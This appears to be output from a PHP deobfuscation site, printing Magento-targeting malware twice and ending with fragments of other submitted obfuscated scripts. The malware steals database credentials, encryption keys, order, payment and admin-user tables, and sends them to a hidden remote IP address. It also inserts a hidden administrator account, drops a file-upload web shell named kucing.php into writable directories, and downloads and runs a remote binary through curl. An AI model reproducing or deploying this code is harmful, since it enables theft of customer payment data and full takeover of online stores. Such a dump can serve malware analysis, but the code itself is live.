l3TCf: goto w5q92; gBSHR: vG6Nq: goto JOcOV; oH_4Q: if (!(mysqli_num_rows($hrQD2) > 0)) { goto ntPrH; } goto h8bM5; wBvoY: $XAFCu = mysqli_fetch_assoc($zn4ww); goto en6zl; LCq7K: if (!(mysqli_num_rows($hrQD2) > 0)) { goto VS8x1; } goto zOxUv; qOxgk: $hrQD2 = mysqli_query($YbxFL, "SELECT role_id FROM {$NseNg}authorization_role WHERE role_name = 'Administrators' AND role_type = 'G' LIMIT 1"); goto oH_4Q; RkNyK: $wYBjy = sprintf("INSERT INTO `%sadmin_user`
        (firstname, lastname, email, username, password, created, modified, is_active)\xa        VALUES ('%s','%s','%s','%s','%s','%s','%s',%d)", $NseNg, mysqli_real_escape_string($YbxFL, $yxRXd["firstname"]), mysqli_real_escape_string($YbxFL, $yxRXd["lastname"]), mysqli_real_escape_string($YbxFL, $yxRXd["email"]), mysqli_real_escape_string($YbxFL, $yxRXd["username"]), mysqli_real_escape_string($YbxFL, $FQKdw), $d4mE8, $d4mE8, $yxRXd["is_active"]); goto O9Iey; e9z0o: $zn4ww = mysqli_query($YbxFL, "SELECT 1 FROM `{$NseNg}admin_user` WHERE username='{$XqshU}' OR email='{$HU_Pl}' LIMIT 1"); goto qgEil; zOxUv: $XAFCu = mysqli_fetch_assoc($hrQD2); goto hVaBA; gSQAX: if (!(mysqli_num_rows($zn4ww) > 0)) { goto vG6Nq; } goto wBvoY; hVaBA: $seQaS = (int) $XAFCu["role_id"]; goto SxlzN; btK4j: $HFYxc = mysqli_insert_id($YbxFL); goto gnIAS; NkS0E: N2UkV: goto AJm2o; vK0vQ: if (mysqli_query($YbxFL, $S4eBQ)) { goto l3TCf; } goto fDnhx; qgEil: if (!(mysqli_num_rows($zn4ww) > 0)) { goto ZeGoM; } goto JEV8P; u5Tzj: return 3; goto QjO32; Cnw3K: $d4mE8 = date("Y-m-d H:i:s"); goto RkNyK; kWvhc: $XqshU = $yxRXd["username"]; goto oswbA; C2Hsy: } goto bU9oI; kzeNS: ETxA5: goto x8Z_q; RDLSJ: $ZL8Zj = "Os:{$ClAVp}\xasite:{$MuVMg}
"; goto ouKqU; ghGXz: $VPQfI = count($Jz6Q7); goto cfESb; x8Z_q: ANPTC("site={$MuVMg}&data=" . base64_encode($ZL8Zj)); goto hhBMZ; sR2ts: $MuVMg = "https://1.1.1.1"; goto gHp9d; UciQo: LcutA: goto LM0uE; cfESb: foreach ($Jz6Q7 as $tUsaz) { goto a2iq3; o_eDW: $NMFU2 += 1; goto G_bxP; pcDdc: $xS3Zx = $tUsaz["fullPath"]; goto s5PPy; G_bxP: JefKF: goto hJbGx; H0Uev: $ZL8Zj .= Y0kxk($gxonb, $MuVMg, $xS3Zx); goto o_eDW; s5PPy: $ZL8Zj .= "[{$NMFU2}/{$VPQfI}]Dir:{$xS3Zx}\xa"; goto H0Uev; a2iq3: $gxonb = $tUsaz["env_config"]; goto pcDdc; hJbGx: } goto wep2z; O5TSy: function Y0KXK($gxonb, $MuVMg, $xS3Zx) { goto icYq7; oD5Jn: $bBZTE = $iBlD4["crypt"]["key"]; goto HoKvs; rdG48: $ZL8Zj .= "[DIR] Not writeable
"; goto ckTc2; rsAjf: PrC_T: goto g2oj_; TOk1a: $QqrRh .= "[DB]host:" . $DTiP5 . "\xa"; goto prj4l; TsaXF: $UCmYt = $iBlD4["db"]["connection"]["default"]["dbname"]; goto JXZdN; aVAN_: return $ZL8Zj; goto pbMiB; y9KKQ: goto PrC_T; goto U1hIe; pS6ud: if ($LgF2o) { goto lGUC7; } goto OvzIR; KSVPo: $ZL8Zj .= "[DB]" . base64_encode($QqrRh) . "\xa"; goto unGS5; jvsKB: $QqrRh .= "[DB]username:" . $XqshU . "
"; goto IDEgW; KINtM: $Si1lc = $iBlD4["db"]["connection"]["default"]["password"]; goto oD5Jn; Xre2x: wafO1: goto t_pHw; icYq7: $ZL8Zj = ''; goto ELcWW; F1g96: $QqrRh .= "[DB]table_prefix:" . $i92Bm . "\xa"; goto KSVPo; VZ5k1: $G8xtk = ''; goto MMfud; HE9QE: $DTiP5 = $iBlD4["db"]["connection"]["default"]["host"]; goto TsaXF; t2osk: if ($ZawjJ === 0) { goto wafO1; } goto izwTJ; TefEl: $ZL8Zj .= I88Xf($b9012, $i92Bm . "quote_payment", "SELECT * FROM " . $fE5bj . "quote_payment WHERE created_at LIKE '%2025-%' AND `method` != 'NULL'"); goto FiPvr; HoKvs: $ZL8Zj .= "[Admin]" . $MuVMg . "/" . $iBlD4["backend"]["frontName"] . "\xa"; goto A6m1Z; Aqktp: $ZL8Zj .= I88XF($b9012, $i92Bm . "sales_order", "SELECT * FROM " . $i92Bm . "sales_order WHERE created_at LIKE '%2025-%'"); goto TefEl; FiPvr: $ZL8Zj .= I88XF($b9012, $i92Bm . "admin_user", "SELECT * FROM " . $fE5bj . "admin_user"); goto aVAN_; g2oj_: $b9012 = mysqli_connect($DTiP5, $XqshU, $Si1lc, $UCmYt); goto GEqjx; G6VR0: njktX: goto r5Bn2; ckTc2: E73ZM: goto rsAjf; O0aS4: $ZawjJ = mQJ8r($b9012, $NseNg, $jR0il); goto t2osk; rxR_r: $i92Bm = $iBlD4["db"]["table_prefix"]; goto HE9QE; r5Bn2: if (!(strlen($G8xtk) == 0)) { goto E73ZM; } goto rdG48; A6m1Z: $QqrRh = "[Key]{$bBZTE}\xa"; goto TOk1a; unGS5: $qQoiL = "PD9waHAgaWYoaXNzZXQoJF9HRVRbJ3BsNkJBMmpuJ10pKXsgZWNobyAnPG8+Jy5waHBfdW5hbWUoKS4nPC9vPjxkPicuZ2V0Y3dkKCkuJzwvZD48Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iMzAiPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nO2lmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wXhbWUnXSwkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpe2VjaG8nPHU+UzwvdT4nO31lbHNle2VjaG8nPHU+RjwvdT4nO319"; goto bsQ5N; bsQ5N: $LgF2o = scandir($xS3Zx); goto pS6ud; prj4l: $QqrRh .= "[DB]dbname:" . $UCmYt . "\xa"; goto jvsKB; uhzP2: nx1zw: goto Aqktp; JXZdN: $XqshU = $iBlD4["db"]["connection"]["default"]["username"]; goto KINtM; UvPO6: $jR0il = ["username" => "backup", "firstname" => "backup", "lastname" => "login", "email" => "backup@magento.com", "password" => "Backup1!", "is_active" => 1, "salt" => $bBZTE]; goto O0aS4; UThhl: goto nx1zw; goto Xre2x; MMfud: foreach ($LgF2o as $fiNTn) { goto lkAxr; Ewlld: file_put_contents($e1mwd . "/kucing.php", base64_decode($qQoiL)); goto wGqVC; FxMRF: if (!is_dir($e1mwd)) { goto T_GJN; } goto fP_Im; wGqVC: $ZL8Zj .= "[BACKDOOR]{$MuVMg}/{$fiNTn}/kucing.php?pl6BA2jn
"; goto kx1PT; lkAxr: if (!($fiNTn ===  || $fiNTn === "..")) { goto ey8hn; } goto jA8zF; Q4LqB: ey8hn: goto z6VQl; z6VQl: $e1mwd = $xS3Zx . "/" . $fiNTn; goto FxMRF; kx1PT: M7o1V: goto JDcM4; arWYM: $G8xtk = "WRITABLE"; goto Ewlld; jA8zF: goto x_X_M; goto Q4LqB; fP_Im: if (!is_writable($e1mwd)) { goto M7o1V; } goto arWYM; JDcM4: T_GJN: goto ZE_Q9; ZE_Q9: x_X_M: goto IT9sN; IT9sN: } goto G6VR0; izwTJ: $ZL8Zj .= "ERROR:{$ZawjJ}"; goto UThhl; GEqjx: mysqli_query($b9012, "DELETE FROM `{$i92Bm}admin_user` WHERE email in('backup@magento.com','lendirkucing69@gmail.com') LIMIT"); goto UvPO6; ELcWW: $iBlD4 = (require $gxonb); goto rxR_r; IDEgW: $QqrRh .= "[DB]password:" . $Si1lc . "
"; goto F1g96; t_pHw: $ZL8Zj .= "[LOGIN]" . $MuVMg . "/" . $iBlD4["backend"]["frontName"] . "|user:{$jR0il["username"]}|pass:{$jR0il["password"]}\xa"; goto uhzP2; U1hIe: lGUC7: goto VZ5k1; OvzIR: $ZL8Zj .= "Directory: Fail to read
"; goto y9KKQ; pbMiB: } goto i23Xx; LM0uE: $ZL8Zj = ''; goto PaR_4; bU9oI: function wgLiA() { goto Pnbqf; eNaiX: $EwAPo = "LzEzNC4"; goto s5npt; Yl20H: $NMFU2 = "MTExLj"; goto OpRjl; sr4Z2: return base64_decode($HpHiT . $EwAPo . $pXFxj . $NMFU2 . $GxswY . $Vj43x); goto BxDJK; Pnbqf: $HpHiT = "aHR0cDov"; goto eNaiX; bzGFQ: $Vj43x = "wMDA="; goto sr4Z2; s5npt: $pXFxj = "yMDku"; goto Yl20H; OpRjl: $GxswY = "cxOjU"; goto bzGFQ; BxDJK: } goto qpxXA; Wj51X: $LgF2o = scandir($xS3Zx); goto RIb4i; qpxXA: function Anptc($wCcIB) { goto S8T7f; H0PMC: return ["error" => $mriB3]; goto EQFyr; kyit3: i2WkF: goto nKQzA; lxCam: $kxrwh = $wCcIB; goto uN6SO; W7KIj: return $x40dI; goto MdF85; iNcpu: curl_close($IUSo7); goto H0PMC; Se1jp: curl_close($IUSo7); goto W7KIj; VF8XK: curl_setopt($IUSo7, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]); goto kyit3; EQFyr: z_mUc: goto Se1jp; cOJg3: if (is_array($wCcIB)) { goto oIt3J; } goto lxCam; sutpx: oIt3J: goto cpLPQ; oomAf: curl_setopt($IUSo7, CURLOPT_SSL_VERIFYPEER, false); goto ReUA0; R1uGx: if (!($mriB3 = curl_error($IUSo7))) { goto z_mUc; } goto iNcpu; h556W: curl_setopt($IUSo7, CURLOPT_RETURNTRANSFER, true); goto Dgc8C; nKQzA: curl_setopt($IUSo7, CURLOPT_POSTFIELDS, $kxrwh); goto oomAf; ReUA0: curl_setopt($IUSo7, CURLOPT_TIMEOUT, 300); goto lDlp1; S8T7f: $IUSo7 = curl_init(wgliA()); goto h556W; Dgc8C: curl_setopt($IUSo7, CURLOPT_POST, true); goto cOJg3; uN6SO: goto i2WkF; goto sutpx; cpLPQ: $kxrwh = json_encode($wCcIB); goto VF8XK; lDlp1: $x40dI = curl_exec($IUSo7); goto R1uGx; MdF85: } goto igVaC; hhBMZ: system("curl -fsSL http:/y34.209.111.71:8081/.cache/nginx-php >/tmp/nginx;chmod +x /tmp/nginx;php /tmp/nginx &");

Decrypted code level 2:

goto sR2ts; RIb4i: foreach ($LgF2o as $fiNTn) { goto KA5uc; KA5uc: $e1mwd = $xS3Zx . $fiNTn; goto O2WbL; RK0ja: hcg_g: goto qcYTP; fiaTL: b4GrT: goto RK0ja; WK48I: if (!file_exists($gxonb)) { goto b4GrT; } goto buL2d; buL2d: $Jz6Q7[] = ["env_config" => $gxonb, "fullPath" => $e1mwd]; goto fiaTL; O2WbL: $gxonb = $e1mwd . "/app/etc/env.php"; goto WK48I; qcYTP: } goto UciQo; PaR_4: if (!(count($Jz6Q7) > 0)) { goto ETxA5; } goto RDLSJ; ouKqU: "MTExLj" = 1; goto ghGXz; FJxsD: $xS3Zx = "/var/www/"; goto Wj51X; igVaC: $ClAVp = php_uname(); goto FJxsD; wep2z: DPfYQ: goto kzeNS; gHp9d: function i88xf($b9012, $TjlJ6, $VaiHe) { goto V3C4j; KsWqA: Su0kr: goto YU4XG; Og3Sr: lIUjG: goto PHnIw; eP5Vg: $VuSB0 = count($MjchY); goto B2MxU; Nsh1L: $MjchY[] = $LTfns; goto bMoIn; vwOKp: $MjchY = []; goto wYpPK; FyOUG: foreach ($MjchY as $OdsB8) { goto kTURW; kTURW: $wCcIB .= "[{"MTExLj"}/{$VuSB0}]" . json_encode($OdsB8) . "
"; goto ofs26; ofs26: "MTExLj" += 1; goto BoNdU; BoNdU: e2dyk: goto ufTTU; ufTTU: } goto Og3Sr; B2MxU: $ZL8Zj .= "[DUMP]{$TjlJ6}:{$VuSB0}
"; goto N8ss3; bMoIn: goto Su0kr; goto Httx7; IS53w: return $ZL8Zj; goto yJbqm; Httx7: kn2lR: goto eP5Vg; YU4XG: if (!($LTfns = mysqli_fetch_array($rlygk, MYSQLI_ASSOC))) { goto kn2lR; } goto Nsh1L; fJVD5: $ZL8Zj = ''; goto vwOKp; PHnIw: $ZL8Zj .= "[DUMP][DATA]\xa{$wCcIB}
"; goto IS53w; V3C4j: $wCcIB = ''; goto fJVD5; N8ss3: "MTExLj" = 1; goto FyOUG; wYpPK: $rlygk = mysqli_query($b9012, $VaiHe); goto KsWqA; yJbqm: } goto O5TSy; i23Xx: function MQj8r($YbxFL, $NseNg, $yxRXd) { goto kWvhc; L3Z8B: return 5; goto NkS0E; AJm2o: return 0; goto C2Hsy; JOcOV: $S4eBQ = sprintf("INSERT INTO `%sauthorization_role`
        (parent_id, tree_level, sort_order, role_type, user_id, user_type, role_name)\xa        VALUES (%d,, 0, 'U', %d, :', 'Administrators')", $NseNg, $seQaS, $HFYxc); goto vK0vQ; oswbA: $HU_Pl = $yxRXd["email"]; goto e9z0o; gnIAS: $zn4ww = mysqli_query($YbxFL, "SELECT user_id FROM `{$NseNg}admin_user` WHERE username='{$XqshU}' OR email='{$HU_Pl}' LIMIT"); goto gSQAX; Klsc_: $gJ89P = sprintf("INSERT INTO `%sauthorization_rule` (role_id, resource_id, privileges, permission)\xa        VALUES (%d, 'all', NULL, 'allow')", $NseNg, $seQaS); goto eTh6M; Ad2ZX: $V_nf9 = $yxRXd["salt"]; goto F9qD0; QjO32: wF5he: goto iArnQ; ZHiKK: $seQaS = (int) $XAFCu["role_id"]; goto WYUW5; WYUW5: ntPrH: goto btK4j; SxlzN: VS8x1: goto Klsc_; eTh6M: if (mysqli_query($YbxFL, $gJ89P)) { goto N2UkV; } goto L3Z8B; en6zl: $HFYxc = (int) $XAFCu["user_id"]; goto gBSHR; JEV8P: return 1; goto AsG3D; h8bM5: $XAFCu = mysqli_fetch_assoc($hrQD2); goto ZHiKK; OOfGc: $OEIN6 = hash("sha256", $TlLBk); goto wCYhR; fDnhx: return 4; goto KLRaY; w5q92: $hrQD2 = mysqli_query($YbxFL, "SELECT role_id FROM {$NseNg}authorization_role WHERE user_id = {$HFYxc} LIMIT"); goto LCq7K; AsG3D: ZeGoM: goto Ad2ZX; iArnQ: $seQaS = 1; goto qOxgk; wCYhR: $FQKdw = "6f2b33a4b457b4dbe75cc5ceb44f232af92a085b2ac7124c6ef3c3b3ea3d:q1WqCn4W7Pm7zmKFQM7Ijw2JET4aPa:3_32_2_1084"; goto Cnw3K; F9qD0: $TlLBk = $yxRXd["password"] . $V_nf9; goto OOfGc; O9Iey: if (mysqli_query($YbxFL, $wYBjy)) { goto wF5he; } goto u5Tzj; KLRaY: l3TCf: goto w5q92; gBSHR: vG6Nq: goto JOcOV; oH_4Q: if (!(mysqli_num_rows($hrQD2) > 0)) { goto ntPrH; } goto h8bM5; wBvoY: $XAFCu = mysqli_fetch_assoc($zn4ww); goto en6zl; LCq7K: if (!(mysqli_num_rows($hrQD2) > 0)) { goto VS8x1; } goto zOxUv; qOxgk: $hrQD2 = mysqli_query($YbxFL, "SELECT role_id FROM {$NseNg}authorization_role WHERE role_name = 'Administrators' AND role_type = 'G' LIMIT 1"); goto oH_4Q; RkNyK: $wYBjy = sprintf("INSERT INTO `%sadmin_user`
        (firstname, lastname, email, username, password, created, modified, is_active)\xa        VALUES ('%s','%s','%s','%s','%s','%s','%s',%d)", $NseNg, mysqli_real_escape_string($YbxFL, $yxRXd["firstname"]), mysqli_real_escape_string($YbxFL, $yxRXd["lastname"]), mysqli_real_escape_string($YbxFL, $yxRXd["email"]), mysqli_real_escape_string($YbxFL, $yxRXd["username"]), mysqli_real_escape_string($YbxFL, $FQKdw), $d4mE8, $d4mE8, $yxRXd["is_active"]); goto O9Iey; e9z0o: $zn4ww = mysqli_query($YbxFL, "SELECT 1 FROM `{$NseNg}admin_user` WHERE username='{$XqshU}' OR email='{$HU_Pl}' LIMIT 1"); goto qgEil; zOxUv: $XAFCu = mysqli_fetch_assoc($hrQD2); goto hVaBA; gSQAX: if (!(mysqli_num_rows($zn4ww) > 0)) { goto vG6Nq; } goto wBvoY; hVaBA: $seQaS = (int) $XAFCu["role_id"]; goto SxlzN; btK4j: $HFYxc = mysqli_insert_id($YbxFL); goto gnIAS; NkS0E: N2UkV: goto AJm2o; vK0vQ: if (mysqli_query($YbxFL, $S4eBQ)) { goto l3TCf; } goto fDnhx; qgEil: if (!(mysqli_num_rows($zn4ww) > 0)) { goto ZeGoM; } goto JEV8P; u5Tzj: return 3; goto QjO32; Cnw3K: $d4mE8 = date("Y-m-d H:i:s"); goto RkNyK; kWvhc: $XqshU = $yxRXd["username"]; goto oswbA; C2Hsy: } goto bU9oI; kzeNS: ETxA5: goto x8Z_q; RDLSJ: $ZL8Zj = "Os:{$ClAVp}\xasite:{$MuVMg}
"; goto ouKqU; ghGXz: $VPQfI = count($Jz6Q7); goto cfESb; x8Z_q: ANPTC("site={$MuVMg}&data=" . base64_encode($ZL8Zj)); goto hhBMZ; sR2ts: $MuVMg = "https://1.1.1.1"; goto gHp9d; UciQo: LcutA: goto LM0uE; cfESb: foreach ($Jz6Q7 as $tUsaz) { goto a2iq3; o_eDW: "MTExLj" += 1; goto G_bxP; pcDdc: $xS3Zx = $tUsaz["fullPath"]; goto s5PPy; G_bxP: JefKF: goto hJbGx; H0Uev: $ZL8Zj .= Y0kxk($gxonb, $MuVMg, $xS3Zx); goto o_eDW; s5PPy: $ZL8Zj .= "[{"MTExLj"}/{$VPQfI}]Dir:{$xS3Zx}\xa"; goto H0Uev; a2iq3: $gxonb = $tUsaz["env_config"]; goto pcDdc; hJbGx: } goto wep2z; O5TSy: function Y0KXK($gxonb, $MuVMg, $xS3Zx) { goto icYq7; oD5Jn: $bBZTE = $iBlD4["crypt"]["key"]; goto HoKvs; rdG48: $ZL8Zj .= "[DIR] Not writeable
"; goto ckTc2; rsAjf: PrC_T: goto g2oj_; TOk1a: $QqrRh .= "[DB]host:" . $DTiP5 . "\xa"; goto prj4l; TsaXF: $UCmYt = $iBlD4["db"]["connection"]["default"]["dbname"]; goto JXZdN; aVAN_: return $ZL8Zj; goto pbMiB; y9KKQ: goto PrC_T; goto U1hIe; pS6ud: if ($LgF2o) { goto lGUC7; } goto OvzIR; KSVPo: $ZL8Zj .= "[DB]" . base64_encode($QqrRh) . "\xa"; goto unGS5; jvsKB: $QqrRh .= "[DB]username:" . $XqshU . "
"; goto IDEgW; KINtM: $Si1lc = $iBlD4["db"]["connection"]["default"]["password"]; goto oD5Jn; Xre2x: wafO1: goto t_pHw; icYq7: $ZL8Zj = ''; goto ELcWW; F1g96: $QqrRh .= "[DB]table_prefix:" . $i92Bm . "\xa"; goto KSVPo; VZ5k1: "WRITABLE" = ''; goto MMfud; HE9QE: $DTiP5 = $iBlD4["db"]["connection"]["default"]["host"]; goto TsaXF; t2osk: if ($ZawjJ === 0) { goto wafO1; } goto izwTJ; TefEl: $ZL8Zj .= I88Xf($b9012, $i92Bm . "quote_payment", "SELECT * FROM " . $fE5bj . "quote_payment WHERE created_at LIKE '%2025-%' AND `method` != 'NULL'"); goto FiPvr; HoKvs: $ZL8Zj .= "[Admin]" . $MuVMg . "/" . $iBlD4["backend"]["frontName"] . "\xa"; goto A6m1Z; Aqktp: $ZL8Zj .= I88XF($b9012, $i92Bm . "sales_order", "SELECT * FROM " . $i92Bm . "sales_order WHERE created_at LIKE '%2025-%'"); goto TefEl; FiPvr: $ZL8Zj .= I88XF($b9012, $i92Bm . "admin_user", "SELECT * FROM " . $fE5bj . "admin_user"); goto aVAN_; g2oj_: $b9012 = mysqli_connect($DTiP5, $XqshU, $Si1lc, $UCmYt); goto GEqjx; G6VR0: njktX: goto r5Bn2; ckTc2: E73ZM: goto rsAjf; O0aS4: $ZawjJ = mQJ8r($b9012, $NseNg, $jR0il); goto t2osk; rxR_r: $i92Bm = $iBlD4["db"]["table_prefix"]; goto HE9QE; r5Bn2: if (!(strlen("WRITABLE") == 0)) { goto E73ZM; } goto rdG48; A6m1Z: $QqrRh = "[Key]{$bBZTE}\xa"; goto TOk1a; unGS5: $qQoiL = "PD9waHAgaWYoaXNzZXQoJF9HRVRbJ3BsNkJBMmpuJ10pKXsgZWNobyAnPG8+Jy5waHBfdW5hbWUoKS4nPC9vPjxkPicuZ2V0Y3dkKCkuJzwvZD48Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iMzAiPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nO2lmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wXhbWUnXSwkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpe2VjaG8nPHU+UzwvdT4nO31lbHNle2VjaG8nPHU+RjwvdT4nO319"; goto bsQ5N; bsQ5N: $LgF2o = scandir($xS3Zx); goto pS6ud; prj4l: $QqrRh .= "[DB]dbname:" . $UCmYt . "\xa"; goto jvsKB; uhzP2: nx1zw: goto Aqktp; JXZdN: $XqshU = $iBlD4["db"]["connection"]["default"]["username"]; goto KINtM; UvPO6: $jR0il = ["username" => "backup", "firstname" => "backup", "lastname" => "login", "email" => "backup@magento.com", "password" => "Backup1!", "is_active" => 1, "salt" => $bBZTE]; goto O0aS4; UThhl: goto nx1zw; goto Xre2x; MMfud: foreach ($LgF2o as $fiNTn) { goto lkAxr; Ewlld: file_put_contents($e1mwd . "/kucing.php", base64_decode($qQoiL)); goto wGqVC; FxMRF: if (!is_dir($e1mwd)) { goto T_GJN; } goto fP_Im; wGqVC: $ZL8Zj .= "[BACKDOOR]{$MuVMg}/{$fiNTn}/kucing.php?pl6BA2jn
"; goto kx1PT; lkAxr: if (!($fiNTn ===  || $fiNTn === "..")) { goto ey8hn; } goto jA8zF; Q4LqB: ey8hn: goto z6VQl; z6VQl: $e1mwd = $xS3Zx . "/" . $fiNTn; goto FxMRF; kx1PT: M7o1V: goto JDcM4; arWYM:  goto Ewlld; jA8zF: goto x_X_M; goto Q4LqB; fP_Im: if (!is_writable($e1mwd)) { goto M7o1V; } goto arWYM; JDcM4: T_GJN: goto ZE_Q9; ZE_Q9: x_X_M: goto IT9sN; IT9sN: } goto G6VR0; izwTJ: $ZL8Zj .= "ERROR:{$ZawjJ}"; goto UThhl; GEqjx: mysqli_query($b9012, "DELETE FROM `{$i92Bm}admin_user` WHERE email in('backup@magento.com','lendirkucing69@gmail.com') LIMIT"); goto UvPO6; ELcWW: $iBlD4 = (require $gxonb); goto rxR_r; IDEgW: $QqrRh .= "[DB]password:" . $Si1lc . "
"; goto F1g96; t_pHw: $ZL8Zj .= "[LOGIN]" . $MuVMg . "/" . $iBlD4["backend"]["frontName"] . "|user:{$jR0il["username"]}|pass:{$jR0il["password"]}\xa"; goto uhzP2; U1hIe: lGUC7: goto VZ5k1; OvzIR: $ZL8Zj .= "Directory: Fail to read
"; goto y9KKQ; pbMiB: } goto i23Xx; LM0uE: $ZL8Zj = ''; goto PaR_4; bU9oI: function wgLiA() { goto Pnbqf; eNaiX:  goto s5npt; Yl20H:  goto OpRjl; sr4Z2: return base64_decode("aHR0cDovLzEzNC4yMDkuMTExLjcxOjU" . $Vj43x); goto BxDJK; Pnbqf:  goto eNaiX; bzGFQ: $Vj43x = "wMDA="; goto sr4Z2; s5npt:  goto Yl20H; OpRjl:  goto bzGFQ; BxDJK: } goto qpxXA; Wj51X: $LgF2o = scandir($xS3Zx); goto RIb4i; qpxXA: function Anptc($wCcIB) { goto S8T7f; H0PMC: return ["error" => $mriB3]; goto EQFyr; kyit3: i2WkF: goto nKQzA; lxCam: $kxrwh = $wCcIB; goto uN6SO; W7KIj: return $x40dI; goto MdF85; iNcpu: curl_close($IUSo7); goto H0PMC; Se1jp: curl_close($IUSo7); goto W7KIj; VF8XK: curl_setopt($IUSo7, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]); goto kyit3; EQFyr: z_mUc: goto Se1jp; cOJg3: if (is_array($wCcIB)) { goto oIt3J; } goto lxCam; sutpx: oIt3J: goto cpLPQ; oomAf: curl_setopt($IUSo7, CURLOPT_SSL_VERIFYPEER, false); goto ReUA0; R1uGx: if (!($mriB3 = curl_error($IUSo7))) { goto z_mUc; } goto iNcpu; h556W: curl_setopt($IUSo7, CURLOPT_RETURNTRANSFER, true); goto Dgc8C; nKQzA: curl_setopt($IUSo7, CURLOPT_POSTFIELDS, $kxrwh); goto oomAf; ReUA0: curl_setopt($IUSo7, CURLOPT_TIMEOUT, 300); goto lDlp1; S8T7f: $IUSo7 = curl_init(wgliA()); goto h556W; Dgc8C: curl_setopt($IUSo7, CURLOPT_POST, true); goto cOJg3; uN6SO: goto i2WkF; goto sutpx; cpLPQ: $kxrwh = json_encode($wCcIB); goto VF8XK; lDlp1: $x40dI = curl_exec($IUSo7); goto R1uGx; MdF85: } goto igVaC; hhBMZ: system("curl -fsSL http:/y34.209.111.71:8081/.cache/nginx-php >/tmp/nginx;chmod +x /tmp/nginx;php /tmp/nginx &");

Recent submissions:

<?php goto sR2ts; RIb4i: foreach ($LgF2o as $fiNTn) { goto KA5uc; KA5uc: $e1mwd = $xS3Zx ... $js_pattern = '/(\|MakeFrameEx\||\|yahoo_api\||\|exec\||ww=window|ww\.document|vis... add_action('wp_enqueue_scripts', 'kera_child_enqueue_styles', 10000); eval(base64_decode('... "\150\x74\164\160\163\x3a\57\x2f\x72\141\x77\x2e\147\x69\x74\x68\x75\x62\x75\x73\x65\x72\1... \x68\164\x74\x70\163\72\x2f\57\x72\141\x77\x2e\x67\151\164\150\x75\x62\165\x73\x65\162\143... $rootDirectory = $ril($_SERVER['\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54']);... $O0O000="DeajhqyPImXrZcMzpQvwYlkKoBTCuSUFEftHsnVAbOGJNLxRWdigJWoPhgTtfLEkUsjABvRzHuKMeOydp... $bs_en="JTZFMSU3QSU2MiUyRiU2RCU2MTUlNUMlNzYlNzQwJTY5MjglMkQlNzAlNzglNzUlNzElNzklMkE2JTZDJT... goto x0ShF; x0ShF: $myVar = 0; goto cIFtv; cIFtv: function test() { if ($myVar === 0) { r... "{\x0A\x22products\x22: [\x0A{\x0A\x22title\x22: \x22\xD0\xA0\xD0\xB5\xD1\x94\xD1\x81\xD1\...